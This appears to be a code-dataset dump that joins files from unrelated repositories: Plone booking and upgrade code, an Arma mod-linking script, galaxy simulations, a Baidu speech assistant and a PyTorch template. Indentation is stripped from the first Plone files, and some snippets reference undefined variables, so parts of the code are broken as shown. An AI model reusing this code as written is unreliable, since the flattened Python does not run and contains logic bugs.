for time_slot in time_slots:
consultation_slot = ConsultationSlot(
consultationSlotCode=time_slot["slot_code"],
consultationSlotTime=time_slot["slot_time"],
consultationSlotTimeEnd=time_slot["slot_time_end"],
bookable=time_slot["bookable"],
)
try:
generator(consultation_slot)
except TimeSlotGenerationError as error:
api.portal.show_message(
str(error),
self.request,
type="error"
)
return self.request.response.redirect(self.next_url)
@button.buttonAndHandler(_(u"cancel"), name="cancel")
def handleCancel(self, action):
self.status = _(u"The process has been cancelled.")
return self.request.response.redirect(addTokenToUrl(self.next_url))
@button.buttonAndHandler(_(u"Create"), name="create")
def handleApply(self, action):
request = self.request
data, errors = self.extractData()
if errors:
self.status = self.formErrorsMessage
return
if request.get("form.buttons.create", None):
self.submitted = True
self.applyChanges(data)
self.status = "Thank you very much!"
def updateActions(self):
super(TimeSlotAddForm, self).updateActions()
self.actions["cancel"].addClass(
"c-button--default c-button--cancel c-button--panel"
)
self.actions["create"].addClass("c-button--primary")
class TimeSlotAdd(FormWrapper):
form = TimeSlotAddForm
def __call__(self, debug="off", **kw):
self.params = {"debug_mode": debug}
# self._update_panel_editor(self.params)
self.update()
return self.render()
def configured_time_slots(self):
context = aq_inner(self.context)
time_slots = list()
stored_time_slots = getattr(context, "time_slots", None)
if stored_time_slots:
for slot in stored_time_slots:
slot_values = slot.split("|")
time_slots.append({"start": slot_values[0], "end": slot_values[1]})
return time_slots
def weekday_name(self, weekday):
context = aq_inner(self.context)
vocabulary_name = "plone.app.vocabularies.Weekdays"
factory = getUtility(IVocabularyFactory, vocabulary_name)
vocabulary = factory(context)
translation_service = api.portal.get_tool(name="translation_service")
weekday_name = translation_service.translate(
vocabulary.getTerm(weekday).title,
"plone",
target_language=api.portal.get_default_language(),
)
return weekday_name
```
#### File: cos/browser/schedule.py
```python
import secrets
import json
from AccessControl import Unauthorized
from Acquisition import aq_inner
from ade25.base.interfaces import IContentInfoProvider
from ade25.base.mailer import send_mail, prepare_email_message, \
create_plaintext_message, get_mail_template
from ade25.base.utils import encrypt_data_stream
from plone import api
from Products.CMFPlone.utils import safe_unicode
from Products.Five.browser import BrowserView
from zExceptions import NotFound
from zope.component import getMultiAdapter, getUtility
from zope.interface import implementer
from zope.publisher.interfaces import IPublishTraverse
from lra.cos.appointments import ConsultationAppointment
from lra.cos.config import BOOKING_FORM
from lra.cos.interfaces import (AppointmentGenerationError,
IConsultationAppointmentGenerator,
IConsultationSlotLocator)
from lra.cos import _
class ConsultingScheduleView(BrowserView):
""" Consulting schedule view """
@staticmethod
def is_editable():
editable = False
if not api.user.is_anonymous():
editable = True
return editable
def show_toolbar(self):
context = aq_inner(self.context)
display_toolbar = False
if self.is_editable():
# Explicitly check for permissions
current_user = api.user.get_current()
display_toolbar = api.user.has_permission(
'LRA Consultation Slots: Manage Slots',
user=current_user,
obj=context
)
return display_toolbar
def has_lead_image(self):
context = aq_inner(self.context)
try:
lead_img = context.image
except AttributeError:
lead_img = None
if lead_img is not None:
return True
return False
def rendered_widget(self):
context = aq_inner(self.context)
view_name = '@@content-widget-lra-consultation-schedule'
rendered_widget = context.restrictedTraverse(view_name)()
return rendered_widget
@implementer(IPublishTraverse)
class BookAppointment(BrowserView):
errors = dict()
form_data = dict()
slot_identifier = None
def __call__(self, debug="off", **kw):
self.params = {"debug_mode": debug}
# self._update_panel_editor(self.params)
self.update()
return self.render()
def render(self):
return self.index()
def update(self):
self.errors = dict()
unwanted = ('_authenticator', 'form.button.Submit')
required = self.form_fields_required_base()
required_boolean = self.form_fields_required_boolean()
if 'form.button.Submit' in self.request:
authenticator = getMultiAdapter((self.context, self.request),
name=u"authenticator")
if not authenticator.verify():
raise Unauthorized
form = self.request.form
form_data = {}
form_errors = {}
error_idx = 0
for field_name in required_boolean:
if not field_name in form:
form_errors[field_name] = self.required_field_error()
error_idx += 1
for value in form:
if value not in unwanted:
form_data[value] = safe_unicode(form[value])
if not form[value] and value in required:
form_errors[value] = self.required_field_error()
error_idx += 1
else:
error = {
'active': False,
'msg': form[value]
}
form_errors[value] = error
if error_idx > 0:
self.errors = form_errors
self.form_data = form_data
else:
self.book_consultation_slot(form)
def publishTraverse(self, request, name):
"""When traversing to .../@@book-appointment/time-slot-code, store the
film code and return self; the next step will be to render the view,
which can then use the code.
"""
if self.slot_identifier is None:
self.slot_identifier = name
return self
else:
raise NotFound()
@staticmethod
def default_value(error):
value = ''
if error['active'] is True:
value = error['msg']
return value
def default_error(self, field_name):
default_field_error = {'active': False, 'msg': ''}
return self.errors.get(field_name, default_field_error)
@staticmethod
def required_field_error():
translation_service = api.portal.get_tool(name="translation_service")
error = {}
error_msg = _(u"This field is required")
error['active'] = True
error['msg'] = translation_service.translate(
error_msg,
'lra.cos',
target_language=api.portal.get_default_language()
)
return error
def default_field_value(self, field_name):
return getattr(self.request, field_name, None)
@staticmethod
def _compose_message(data, template_name):
portal = api.portal.get()
portal_url = portal.absolute_url()
template_vars = {
'email': data['email'],
'subject': str(data['subject']),
'message': data['comment'],
'url': portal_url
}
message = get_mail_template(template_name, template_vars)
return message
def prepare_booking_request(self, form_data):
booking_request = dict()
form_fields = self.form_fields()
for field_id, field_details in form_fields.items():
field_name = field_details.get("name")
field_name_key = "{0}_title".format(field_name)
booking_request.update({
field_id: form_data.get(field_id, ""),
field_name_key: field_name
})
return booking_request
def send_confirmation_mail(self, mail_to, subject, form_data, template_name):
email_subject = api.portal.translate(
"Inquiry from website visitor",
'ade25.contacts',
api.portal.get_current_language())
mail_tpl = self._compose_message(form_data, template_name)
mail_plain = create_plaintext_message(mail_tpl)
msg = prepare_email_message(mail_tpl, mail_plain)
recipients = [mail_to, ]
send_mail(
msg,
recipients,
subject
)
return
def send_confirmation(self, form_data, appointment):
context = aq_inner(self.context)
email_from = api.portal.get_registry_record("plone.email_from_address")
email_from_name = api.portal.get_registry_record("plone.email_from_name")
contact_email = getattr(context, "contact_email", email_from)
mail_to = form_data.get("email")
mail_content = {
"sender_name": email_from_name,
"sender_email": contact_email,
"appointment_code": appointment.get("consultationAppointmentCode")
}
mail_content.update(self.requested_time_slot())
mail_content.update(self.prepare_booking_request(form_data))
return
def prepare_appointment_data(self, data):
appointment = {
"consultationAppointmentCode": secrets.token_urlsafe(64),
"consultationAppointmentConstructionYear": data.get("construction_year"),
"consultationAppointmentContactEmail": data.get("email"),
"consultationAppointmentContactFirstName": data.get("first_name"),
"consultationAppointmentContactLastName": data.get("last_name"),
"consultationAppointmentContactSalutation": "",
"consultationAppointmentRequest": encrypt_data_stream(json.dumps(data)),
"consultationSlotCode": self.slot_identifier,
"data_protection_notice": True,
"privacy_notice": True
}
return appointment
def book_consultation_slot(self, data):
context = aq_inner(self.context)
generator = getUtility(IConsultationAppointmentGenerator)
appointment = self.prepare_appointment_data(data)
try:
generator(appointment)
except AppointmentGenerationError as error:
api.portal.show_message(
str(error),
self.request,
type="error"
)
self.send_confirmation(data, appointment)
next_url = '{0}/@@book-appointment-success/{1}'.format(
context.absolute_url(),
appointment.get("consultationAppointmentCode")
)
return self.request.response.redirect(next_url)
@staticmethod
def time_stamp(item, date_time):
content_info_provider = IContentInfoProvider(item)
time_stamp = content_info_provider.time_stamp(date_time)
return time_stamp
def requested_time_slot(self):
context = aq_inner(self.context)
locator = getUtility(IConsultationSlotLocator)
time_slot = locator.time_slot(self.slot_identifier)
time_slot.update({
"slot_start": self.time_stamp(context, time_slot['slot_time']),
"slot_end": self.time_stamp(context, time_slot['slot_time_end'])
})
return time_slot
@staticmethod
def form_setup():
return BOOKING_FORM
def form_fields(self):
fields = dict()
for field_set in self.form_setup().values():
for field in field_set.get("fields", list()):
field_id = field.get("id")
field.pop("id")
fields.update({
field_id: field
})
return fields
def form_fields_required(self):
required_fields = {}
for field_set in self.form_setup().values():
for field in field_set.get("fields", list()):
if field["required"]:
required_fields.update({field["id"]: field["field_type"]})
return required_fields
def form_fields_required_boolean(self):
required = [
form_field
for form_field, field_type in self.form_fields_required().items()
if field_type in ["boolean", "privacy"]
]
return required
def form_fields_required_base(self):
required = [
form_field
for form_field, field_type in self.form_fields_required().items()
if field_type not in ["boolean", "privacy"]
]
return required
@implementer(IPublishTraverse)
class BookAppointmentSuccess(BrowserView):
appointment_identifier = None
def publishTraverse(self, request, name):
"""When traversing to .../@@book-appointment-success/appointment-code,
extract the necessary information and provide appropriate user feedback.
"""
if self.appointment_identifier is None:
self.appointment_identifier = name
return self
else:
raise NotFound()
```
#### File: lra/cos/__init__.py
```python
from sqlalchemy.ext import declarative
from z3c.saconfig import named_scoped_session
from zope.i18nmessageid import MessageFactory
_ = MessageFactory('lra.cos')
def initialize(context):
"""Initializer called when used as a Zope 2 product."""
# Create a base class used for object relational mapping classes
ORMBase = declarative.declarative_base()
Session = named_scoped_session('lra_cos')
```
#### File: sitecontent/tests/test_setup.py
```python
from lra.sitecontent.testing import IntegrationTestCase
from plone import api
class TestInstall(IntegrationTestCase):
"""Test installation of lra.sitecontent into Plone."""
def setUp(self):
"""Custom shared utility setup for tests."""
self.portal = self.layer['portal']
self.installer = api.portal.get_tool('portal_quickinstaller')
def test_product_installed(self):
"""Test if lra.sitecontent is installed with portal_quickinstaller."""
self.assertTrue(self.installer.isProductInstalled('lra.sitecontent'))
def test_uninstall(self):
"""Test if lra.sitecontent is cleanly uninstalled."""
self.installer.uninstallProducts(['lra.sitecontent'])
self.assertFalse(self.installer.isProductInstalled('lra.sitecontent'))
# browserlayer.xml
def test_browserlayer(self):
"""Test that ILraSitecontentLayer is registered."""
from lra.sitecontent.interfaces import ILraSitecontentLayer
from plone.browserlayer import utils
self.failUnless(ILraSitecontentLayer in utils.registered_layers())
```
#### File: lra/sitecontent/upgrades.py
```python
import logging
from zExceptions import BadRequest
from zope.globalrequest import getRequest
from plone import api
from plone.app.upgrade.utils import cleanUpSkinsTool
default_profile = 'profile-lra.sitecontent:default'
log = logging.getLogger(__name__)
def remove_ploneformgen(context=None):
portal = api.portal.get()
portal_types = api.portal.get_tool('portal_types')
portal_catalog = api.portal.get_tool('portal_catalog')
qi = api.portal.get_tool('portal_quickinstaller')
log.info('removing PloneFormGen')
old_types = [
'FormFolder',
]
old_types = [i for i in old_types if i in portal_types]
for old_type in old_types:
for brain in portal_catalog(portal_type=old_type):
log.info(u'Deleting Existing Instances of {}!'.format(old_type))
api.content.delete(brain.getObject(), check_linkintegrity=True)
try:
portal.manage_delObjects(['formgen_tool'])
except AttributeError:
pass
try:
portal.portal_properties.manage_delObjects(['ploneformgen_properties'])
except BadRequest:
pass
if qi.isProductInstalled('PloneFormGen'):
qi.uninstallProducts(['PloneFormGen'])
if qi.isProductInstalled('Products.PloneFormGen'):
qi.uninstallProducts(['Products.PloneFormGen'])
def migrate_ATBTreeFolder(context=None):
"""Replace very old containers for news, events and Members
"""
from plone.portlets.interfaces import ILocalPortletAssignmentManager
from plone.portlets.interfaces import IPortletManager
from zope.component import getMultiAdapter
from zope.component import queryUtility
portal = api.portal.get()
# create new containers:
if not portal['Members'].__class__.__name__ == 'ATBTreeFolder':
log.info('Migrating ATBTreeFolder not needed')
return
log.info('Migrating ATBTreeFolders')
members_new = api.content.create(
container=portal,
type='Folder',
id='members_new',
title=u'Benutzer',
)
members_new.setOrdering('unordered')
members_new.setLayout('@@member-search')
# Block all right column portlets by default
manager = queryUtility(IPortletManager, name='plone.rightcolumn')
if manager is not None:
assignable = getMultiAdapter(
(members_new, manager),
ILocalPortletAssignmentManager
)
assignable.setBlacklistStatus('context', True)
assignable.setBlacklistStatus('group', True)
assignable.setBlacklistStatus('content_type', True)
for item in portal.Members.contentValues():
api.content.move(
source=item,
target=members_new,
)
api.content.delete(obj=portal['Members'], check_linkintegrity=False)
api.content.rename(obj=portal['members_new'], new_id='Members')
def uninstall_archetypes(context=None):
portal = api.portal.get()
request = getRequest()
installer = api.content.get_view('installer', portal, request)
addons = [
        'Archetypes',
'ATContentTypes',
'plone.app.referenceablebehavior',
'plone.app.blob',
'plone.app.imaging',
]
for addon in addons:
if installer.is_product_installed(addon):
installer.uninstall_product(addon)
def remove_archetypes_traces(context=None):
portal = api.portal.get()
# remove obsolete AT tools
tools = [
'portal_languages',
'portal_tinymce',
'kupu_library_tool',
'portal_factory',
'portal_atct',
'uid_catalog',
'archetype_tool',
'reference_catalog',
'portal_metadata',
]
for tool in tools:
if tool not in portal.keys():
log.info('Tool {} not found'.format(tool))
continue
try:
portal.manage_delObjects([tool])
log.info('Deleted {}'.format(tool))
except Exception as e:
log.info(u'Problem removing {}: {}'.format(tool, e))
try:
log.info(u'Fallback to remove without permission_checks')
portal._delObject(tool)
log.info('Deleted {}'.format(tool))
except Exception as e:
log.info(u'Another problem removing {}: {}'.format(tool, e))
def pack_database(context=None):
"""Pack the database"""
portal = api.portal.get()
app = portal.__parent__
db = app._p_jar.db()
db.pack(days=0)
def cleanup_in_plone52(context=None):
migrate_ATBTreeFolder()
uninstall_archetypes()
remove_archetypes_traces()
portal = api.portal.get()
cleanUpSkinsTool(portal)
qi = api.portal.get_tool('portal_quickinstaller')
# Fix diazo theme
qi.reinstallProducts(['plone.app.theming'])
# Fix issue where we cannot pack the DB after it was migrated to Python 3
qi.reinstallProducts(['plone.app.relationfield'])
pack_database()
def upgrade_1001(setup):
# Cleanup installation
cleanup_in_plone52()
```
#### File: lra/sitetheme/__init__.py
```python
from zope.i18nmessageid import MessageFactory
_ = MessageFactory('lra.sitetheme')
def initialize(context):
"""Initializer called when used as a Zope 2 product."""
``` |
{
"source": "A26mike/Arma-Python-server-manager",
"score": 3
} |
#### File: A26mike/Arma-Python-server-manager/testing.py
```python
import os
from functools import reduce
def get_directory_structure(rootdir):
    """
    Creates a nested dictionary that represents the folder structure of rootdir
    """
    dir_tree = {}
    rootdir = rootdir.rstrip(os.sep)
    start = rootdir.rfind(os.sep) + 1
    for path, dirs, files in os.walk(rootdir):
        folders = path[start:].split(os.sep)
        subdir = dict.fromkeys(files)
        parent = reduce(dict.get, folders[:-1], dir_tree)
        parent[folders[-1]] = subdir
    return dir_tree
for i in range(0, modlistsize):
if not os.path.exists(servermodpath_list[i]):
os.system( 'mklink /J ' + servermodpath_list[i] + ' ' + steammod_list[i] )
print(steammod_list[i] + ' ' + servermodpath_list[i] )
# Creates junctions in a loop, skipping any that were already made.
# TODO: check for extra junctions that the user did not select.
# TODO: handle spaces in the paths -- quote them for mklink (see the sketch below).
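# A minimal sketch of the quoting fix flagged above (assumes the same
# servermodpath_list / steammod_list variables as the loop before it):
# wrapping both paths in quotes lets mklink handle spaces.
# for link, target in zip(servermodpath_list, steammod_list):
#     if not os.path.exists(link):
#         os.system('mklink /J "{}" "{}"'.format(link, target))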
from tkinter import Tk, Listbox
from tkinter import filedialog
import os
root = Tk()
root.withdraw()
current_directory = filedialog.askdirectory()
file_name = "test.txt"
file_path = os.path.join(current_directory,file_name)
print(file_path)
# use the os.path.join method to join paths rather than a simple + string concatenation. This way the code will work on multiple platforms (Windows/Mac/Linux)
# For example, populating a Listbox with the directory contents
# (assumes a tkinter Frame named `frame` already exists):
listbox = Listbox(frame)
for name in os.listdir(current_directory):
    listbox.insert('end', name)
``` |
{
"source": "a2734961/AutomatedTestingDemo",
"score": 3
} |
#### File: AutomatedTestingDemo/hybrid_app/HybridScript.py
```python
import unittest
import time
from appium import webdriver
class MyTestCase(unittest.TestCase):
def setUp(self):
        # Define the initial desired capabilities
self.desired_caps = {}
self.desired_caps['platformName'] = 'Android'
self.desired_caps['platformVersion'] = '6.0'
self.desired_caps['deviceName'] = '192.168.115.101:5555'
self.desired_caps['appPackage'] = 'com.hyd.miniwebbrowser'
self.desired_caps['appActivity'] = '.MainActivity'
self.desired_caps["unicodeKeyboard"] = "True"
self.desired_caps["resetKeyboard"] = "True"
self.desired_caps["automationName"] = "Selendroid"
self.driver = webdriver.Remote('http://localhost:4723/wd/hub', self.desired_caps)
    def testSearch(self):
        # Locate the URL input field
        input_url = self.driver.find_element_by_id("et_url")
        # Operate: enter the URL and trigger the search
        input_url.send_keys("https://wap.sogou.com")
        btn_search = self.driver.find_element_by_id("btn_search")
        btn_search.click()
        time.sleep(5)
        # Switch the current context to the webview
        print(self.driver.contexts)
        self.driver.switch_to.context('WEBVIEW_0')
        print(self.driver.current_context)
        time.sleep(5)
        # Locate the in-page search input
        web_input = self.driver.find_element_by_xpath('//*[@id="keyword"]')
        web_input.click()
        web_input.send_keys("2020")
        web_search_button = self.driver.find_element_by_xpath('//*[@id="searchform"]/div/div/div[1]/div[2]/input')
        web_search_button.click()
        time.sleep(5)
        # Verify the first search result
        first_result = self.driver.find_element_by_xpath('//*[@id="sogou_vr_30010212_1"]/div/div[1]/a[1]')
        self.assertTrue("2020" in first_result.text)
def tearDown(self):
self.driver.quit()
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "a276me/Dark_Forest_Simulation",
"score": 3
} |
#### File: a276me/Dark_Forest_Simulation/Galaxy.py
```python
import math
import random
import Civilization
class Galaxy:
def __init__(self, x : int , y: int, InitCivs: int, MaxCivs=100, slowStart=True):
self.Civilizations = []
self.Dead = []
self.Max = InitCivs
self.civsMade = 0
self.Xsize = x
self.Ysize = y
self.NewCiv = False
self.New = []
self.age = 0
self.initializing = True
self.Stats = {'Wars':0, 'Cease Fires':0, 'Civilizations':0, 'Conveys':0, 'Ally Aids':0, 'Civil Wars':0}
if not slowStart:
for i in range(InitCivs):
self.Civilizations.append(Civilization.Civilization(self))
print(self.Civilizations[-1].transformCoord())
self.Stats['Civilizations'] +=1
else:
self.slowInit()
def slowInit(self):
if self.civsMade < self.Max and self.initializing:
for i in range(random.randint(-2,5)):
if self.civsMade < self.Max:
self.create()
self.civsMade +=1
else:
self.initializing = False
def create(self):
new = Civilization.Civilization(self)
self.New.append(new)
self.Civilizations.append(new)
self.NewCiv = True
self.Stats['Civilizations'] +=1
def newCiv(self):
self.NewCiv = False
if random.randint(0,100) < 1:
self.create()
def removeCiv(self, civ):
# remove Civ if civilization is dead
print(civ.Name+' Has been Destroyed')
self.Dead.append(civ)
self.Civilizations.remove(civ)
# remove the civ from all War lists
for i in self.Civilizations:
if civ in i.War:
i.War.remove(civ)
# remove the civ from knownCivs list
for i in self.Civilizations:
if civ in i.KnownCivs:
i.KnownCivs.remove(civ)
for i in self.Civilizations:
if civ in i.Ally:
i.Ally.remove(civ)
def end(self):
if len(self.Civilizations)<=1 and self.initializing is False:
return True
else:
return False
def getTotalConveys(self):
ret = []
for i in self.Civilizations:
for c in i.Conveys:
ret.append(c)
return ret
def getWinner(self):
if self.end():
return self.Civilizations[0]
def move(self):
self.slowInit()
self.newCiv()
for i in self.Civilizations:
i.move()
print(i)
self.age +=1
def getCivilizations(self, x,y,r):
ret = []
for i in self.Civilizations:
if x == i.X and y == i.Y:
continue
            elif math.sqrt(((i.X-x)**2)+((i.Y-y)**2)) <= r:  # Pythagorean distance check against the radius r
ret.append(i)
return ret
def getDistance(self, civ1, civ2):
return round(math.sqrt(((civ1.X-civ2.X)**2)+((civ1.Y-civ2.Y)**2)), 2)
if __name__ == '__main__':
Gal = Galaxy(10,10,10)
while True:
Gal.move()
print('***************')
for i in Gal.getTotalConveys():
print(i)
print('---------------')
input()
```
#### File: a276me/Dark_Forest_Simulation/Tools.py
```python
import math
def getDistance(civ1, civ2):
return round(math.sqrt(((civ1.X-civ2.X)**2)+((civ1.Y-civ2.Y)**2)),2)
def getQuad(origin, target):
    if target.X >= origin.X and target.Y >= origin.Y:  # target is in quadrant 1 (upper right) relative to the sender
        return 1
    elif target.X >= origin.X and target.Y <= origin.Y:  # target is in quadrant 4 (lower right) relative to the sender
        return 4
    elif target.X <= origin.X and target.Y >= origin.Y:  # target is in quadrant 2 (upper left) relative to the sender
        return 2
    elif target.X <= origin.X and target.Y <= origin.Y:  # target is in quadrant 3 (lower left) relative to the sender
        return 3
def calculateAngle(origin, target, convey):
    '''
    Return the bearing angle, in degrees, from origin to target.
    '''
    if target.X >= origin.X and target.Y >= origin.Y:  # quadrant 1 (upper right)
        return math.asin(abs(target.X-origin.X)/convey.Distance)*(180/math.pi)
    elif target.X >= origin.X and target.Y <= origin.Y:  # quadrant 4 (lower right)
        return math.asin(-1*abs(target.X-origin.X)/convey.Distance)*(180/math.pi)
    elif target.X <= origin.X and target.Y >= origin.Y:  # quadrant 2 (upper left)
        return math.acos(-1*abs(target.X-origin.X)/convey.Distance)*(180/math.pi)
    elif target.X <= origin.X and target.Y <= origin.Y:  # quadrant 3 (lower left)
        temp = math.acos(-1*abs(target.X-origin.X)/convey.Distance)
        return ((math.pi - temp) + math.pi)*(180/math.pi)
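# Worked example (hypothetical values): with origin at (0, 0), target at
# (3, 4) and convey.Distance = 5, getQuad returns 1 and calculateAngle
# returns asin(3/5) * (180/pi) ~= 36.87 degrees, i.e. the bearing measured
# from the +Y axis toward +X.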
``` |
{
"source": "a276me/iris",
"score": 2
} |
#### File: a276me/iris/action.py
```python
import command
import pyttsx3 as pt
import apps
def do(cmd: command.Command):
if cmd.object is None:
e = pt.Engine()
e.say('sorry sir, i do not understand that')
e.runAndWait()
else:
        cmd.object['main'](cmd)
```
#### File: a276me/iris/apps.py
```python
import pyttsx3 as pt
import sys
import random
import scipy.io.wavfile as wav
import sounddevice as sd
def shutdown(cmd):
e = pt.Engine()
e.say("good bye sir")
e.runAndWait()
sys.exit(101)
def record_denoiser(cmd):
e = pt.Engine()
e.say("Recording a new noise file")
e.runAndWait()
e.say("please remain silent for the best possible effect")
e.runAndWait()
e.say("starting in 3, 2, 1")
e.runAndWait()
fs = 16000
myrecording = sd.rec(int(4 * fs), samplerate=fs, channels=1, dtype='int16')
sd.wait() # Wait until recording is finished
e.say("finished")
e.runAndWait()
sd.play(myrecording, fs)
sd.wait()
wav.write(f'./tmp/static.wav', fs, myrecording)
routes = [
{'name': 'shutdown', 'main': shutdown, 'keys': ['exit','shutdown','shut down']},
{'name': 'new denoiser', 'main': record_denoiser, 'keys': ['denoiser','record','new denoiser','e nois']}
]
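# A minimal dispatch sketch (an assumption -- command.Command presumably
# resolves its `object` with something similar): return the first route
# whose key occurs in the recognized text, or None when nothing matches.
def match_route(text):
    for route in routes:
        if any(key in text for key in route['keys']):
            return route
    return None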
```
#### File: a276me/iris/initiate.py
```python
import wave
import requests
import time
import base64
import numpy as np
from pyaudio import *
import noisereduce as nr
import scipy.io.wavfile as wav
import matplotlib.pyplot as plt
import sounddevice as sd
import soundfile as sf
import denoise
import pyttsx3 as pt
import re
import random
SEC = 4
framerate = 16000  # sample rate
num_samples = 1024  # samples per read
channels = 1  # number of channels
sampwidth = 2  # sample width, 2 bytes
FILEPATH = 'speech.wav'
base_url = "https://openapi.baidu.com/oauth/2.0/token?grant_type=client_credentials&client_id=%s&client_secret=%s"
APIKey = "*******"
SecretKey = "*******"
HOST = base_url % (APIKey, SecretKey)
def getToken(host):
res = requests.post(host)
return res.json()['access_token']
def save_wave_file(filepath, data):
wf = wave.open(filepath, 'wb')
wf.setnchannels(channels)
wf.setsampwidth(sampwidth)
wf.setframerate(framerate)
wf.writeframes(b''.join(data))
wf.close()
def my_record(sec, wake_val: float=0.05):
print('record')
# pa = PyAudio()
# stream = pa.open(format=paInt16, channels=channels,
# rate=framerate, input=True, frames_per_buffer=num_samples)
# my_buf = []
# # count = 0
# t = time.time()
# # print('正在录音...')
#
# while time.time() < t + 2: # 秒
# string_audio_data = stream.read(num_samples)
# my_buf.append(string_audio_data)
# # print('录音结束.')
# save_wave_file(FILEPATH, my_buf)
# stream.close()
while True:
test = sd.rec(int(16000*0.5), 16000,1)
sd.wait()
# plt.plot(recc)
# plt.show()
for i in test:
if i > wake_val:
recc = sd.rec(int(sec * framerate), samplerate=framerate, channels=1, dtype='int16')
sd.wait()
# denoise.denoiser(FILEPATH)
recc = np.concatenate((test, recc))
wav.write(FILEPATH, framerate, recc)
return
def get_audio(file):
# fp, data = wav.read(file)
# t, n = wav.read('./tmp/static.wav')
# print(n.dtype)
# print(data.dtype)
# data.dtype = 'float32'
#
# ret = nr.reduce_noise(audio_clip=data,
# noise_clip=n, verbose=False)
# ret = np.asarray(ret)
# print(ret)
# plt.plot(ret)
# # plt.plot(data)
# # plt.plot(n)
# plt.show()
#
# print(ret)
# wav.write(file, rate=fp, data=ret)
with open(file, 'rb') as f:
data = f.read()
return data
def speech2text(speech_data, token, dev_pid=1537):
FORMAT = 'wav'
RATE = '16000'
CHANNEL = 1
CUID = '*******'
SPEECH = base64.b64encode(speech_data).decode('utf-8')
data = {
'format': FORMAT,
'rate': RATE,
'channel': CHANNEL,
'cuid': CUID,
'len': len(speech_data),
'speech': SPEECH,
        'token': token,
'dev_pid': dev_pid
}
url = 'https://vop.baidu.com/server_api'
headers = {'Content-Type': 'application/json'}
# r=requests.post(url,data=json.dumps(data),headers=headers)
    # print('recognizing...')
r = requests.post(url, json=data, headers=headers)
Result = r.json()
print(Result)
if 'result' in Result:
return Result['result'][0]
else:
return ' '
# def openbrowser(text):
# maps = {
# '百度': ['百度', 'baidu'],
# '腾讯': ['腾讯', 'tengxun'],
# '网易': ['网易', 'wangyi']
#
# }
# if text in maps['百度']:
# webbrowser.open_new_tab('https://www.baidu.com')
# elif text in maps['腾讯']:
# webbrowser.open_new_tab('https://www.qq.com')
# elif text in maps['网易']:
# webbrowser.open_new_tab('https://www.163.com/')
# else:
# webbrowser.open_new_tab('https://www.baidu.com/s?wd=%s' % text)
def get_mean():
    # Wake threshold: five times the mean absolute amplitude of the
    # recorded background-noise file
    data, fs = sf.read('./tmp/static.wav', dtype='float32')
    d = [abs(i) for i in data]
    return np.average(d)*5
def initiate():
    devpid = 1737  # input('1536: Mandarin (basic English), 1537: Mandarin (with punctuation), 1737: English, 1637: Cantonese, 1837: Sichuanese\n')
print(get_mean())
my_record(2, get_mean())
t = time.time()
denoise.denoiser(FILEPATH)
TOKEN = getToken(HOST)
speech = get_audio(FILEPATH)
result = speech2text(speech, TOKEN, int(devpid))
print(time.time()-t)
if type(result) == str:
return result
# if type(result) == str:
# openbrowser(result.strip(','))
# flag = input('Continue?(y/n):')
def waitcall():
    activations = ['iris', 'Irish', 'irish', 'IRS']
reps = ['at your service', 'i am listening', 'may i help you sir', 'what can i do for you']
engine = pt.engine.Engine()
while True:
ret = initiate()
if ret:
print(ret)
for i in activations:
if i in ret:
engine.say('yes sir?')
engine.say(random.choice(reps))
engine.runAndWait()
return True
def recognize_command():
my_record(4, get_mean()*0.8)
denoise.denoiser(FILEPATH)
TOKEN = getToken(HOST)
speech = get_audio(FILEPATH)
result = speech2text(speech, TOKEN, int(1737))
if type(result) == str:
return result
if __name__ == '__main__':
sentence = ['']
activations = ['iris', 'Irish', 'irish', 'IRS']
engine = pt.engine.Engine()
while True:
initiate()
print(sentence)
last = sentence[-1]
last = last.split(' ')
for i in last:
if i in activations:
engine.say('yes sir?')
engine.runAndWait()
break
``` |
{
"source": "a276me/project-42",
"score": 3
} |
#### File: core/dep/main.py
```python
import readcsv
import random
import pygame
from core.star import Star
from core.Civilization import *
from pygame.locals import *
from core.misc import *
CIVS = []
STARS = []
def setup():
global CIVS, STARS
q, w = readcsv.getpoints()
P = [[q[i],w[i]] for i in range(len(q))]
CIVS = [Civilization('neutral',0), Civilization('test',25),Civilization('test',10)]
CIVS[0].color = (255,255,255)
# cdef int i = 0
for i in range(2000):
p = random.choice(P)
STARS.append(Star(p[0], p[1]))
def move():
global CIVS
# cdef int k = 0
# cdef int j = 0
# cdef int i
for c in range(1, len(CIVS), 1):
newsys = []
for k in range(CIVS[c].tech):
# if len(CIVS[c].tmp) > len(CIVS[c].systems)*0.8:
# CIVS[c].tmp = []
i = random.choice(CIVS[c].systems)
# while i in CIVS[c].tmp:
# i = random.choice(CIVS[c].systems)
nps = []
for j in range(len(STARS)):
if dist(STARS[i].POS, STARS[j].POS) < 10+CIVS[c].tech and j not in CIVS[c].systems:
nps.append(j)
# print(len(CIVS[c].systems))
if len(nps) > 0: newsys.append(random.choice(nps))
CIVS[c].systems += newsys
for i in newsys:
CIVS[STARS[i].owner].remove(i)
STARS[i].owner = CIVS[c].id
if random.randint(0,1000) < 5:
CIVS[c].tech += 1
print('tech increased')
elif random.randint(0,1000) < 2:
CIVS[c].tech -= 1
print('tech decreased')
# print(CIVS[c].tech)
if random.randint(0,1000) < 5:
print('civilization formed!')
CIVS.append(Civilization('test', random.choice(CIVS[0].systems)))
if random.randint(0,1000) < 20:
print(len(CIVS[0].systems))
return 1
```
#### File: a276me/project-42/readcsv.py
```python
import csv
def getpoints():
with open('points.csv', mode="r") as csv_file:
reader = csv.reader(csv_file)
a = []
for item in reader:
a.append(item)
x_points, y_points = [[(int(i)+2600)*0.13 for i in a[0]],[(int(i)+2600)*0.13 for i in a[1]]]
return x_points, y_points
``` |
{
"source": "a2819z/pytorch-template",
"score": 2
} |
#### File: pytorch-template/models/model.py
```python
import torch.nn as nn
from .encoder import Encoder
from .decoder import Decoder
class Generator(nn.Module):
def __init__(self, cfg):
super(Generator, self).__init__()
self.content_enc = Encoder(cfg.content_enc)
self.style_enc = Encoder(cfg.style_enc)
self.decoder = Decoder(cfg.decoder)
def forward(self, content, styles, interpolation_weight=None):
x = self.content_enc(content)
style_features = []
for style in styles:
s, s_features = self.style_enc(style)
s_features.reverse() # Reordering style features for decoding
s_features.append(s)
style_features.append(s_features)
x = self.decoder(x, style_features, interpolation_weight)
return x
```
#### File: pytorch-template/trainer/base_trainer.py
```python
from abc import abstractmethod
from torch.cuda import amp
from torch.nn.parallel import DistributedDataParallel as DDP
import torch.nn.functional as F
from utils.torch_utils import ModelEMA, is_main_worker
class BaseTrainer:
def __init__(self, model, optimizer, writer, logger, evaluator, test_loader, cfg):
self.model = model
self.ema = ModelEMA(self.model) if is_main_worker(cfg.gpu) else None
